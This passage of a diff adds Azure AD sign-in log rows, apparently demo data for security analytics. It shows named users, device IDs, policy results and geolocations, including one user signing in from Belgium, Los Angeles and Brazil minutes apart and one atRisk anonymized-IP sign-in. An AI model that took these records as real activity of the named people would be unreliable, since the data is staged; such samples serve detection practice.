+1414,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:47.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,50d682af-285a-4b01-89be-40742ffb8984,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",c0245186-29e3-436a-add4-db490dd40500,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,c0245186-29e3-436a-add4-db490dd40500,SigninLogs,Sucess,50.6406517,5.572050095
+1415,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:47.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,50d682af-285a-4b01-89be-40742ffb8984,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",c0245186-29e3-436a-add4-db490dd40500,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,c0245186-29e3-436a-add4-db490dd40500,SigninLogs,Sucess,50.6406517,5.572050095
+1416,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:08.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8b62a34a-f7bd-4b4c-aaf3-582e75a049cf,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",65ce963c-c870-4311-8389-19e590880600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,65ce963c-c870-4311-8389-19e590880600,SigninLogs,Sucess,34.06555176,-118.2405396
+1417,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:22.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7310f976-b66c-44b4-9c11-e3ef73e2a492,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:33,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",97e73a60-bce7-40f8-a302-e6813f913600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,97e73a60-bce7-40f8-a302-e6813f913600,SigninLogs,Sucess,38.47222137,-77.41989899
+1418,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:57.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,90c00092-27b2-41eb-8565-b4f264d8f34b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:24,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",37105d23-9607-4aeb-a84b-5fa36dd80700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,37105d23-9607-4aeb-a84b-5fa36dd80700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1419,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:32.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6b13be09-0fe6-42bf-a1e9-b652ae050717,Microsoft.aadiam,Microsoft.aadiam,,Lori Chaconas,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:38,"{'operatingSystem': 'Windows 10', 'deviceId': '3587ac6d-3b32-4895-bfa9-72dd03d38cb6', 'browser': 'Chrome 80.0.3987', 'displayName': 'LCFLAGLER12', 'trustType': 'Azure AD registered', 'isCompliant': True, 'isManaged': True}",9b73e957-44ae-40ab-bb07-110288b73900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -81.21395111083984, 'latitude': 29.480300903320312}, 'state': 'Florida', 'city': 'Palm Coast'}",none,none,none,none,[],{'errorCode': 0},Lori Chaconas,f0bc9cf3-99bd-47bd-a8d9-b9a3d2a8e647,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,9b73e957-44ae-40ab-bb07-110288b73900,SigninLogs,Sucess,29.4803009,-81.21395111
+1420,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:30.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5006f22d-a934-42b0-8a4c-b687d5e64584,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",34805c5b-6a36-487d-9189-7bc1f3db0500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,34805c5b-6a36-487d-9189-7bc1f3db0500,SigninLogs,Sucess,34.06555176,-118.2405396
+1421,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:58.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d3a86e71-fc63-45cb-9cf7-b343206a5434,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block 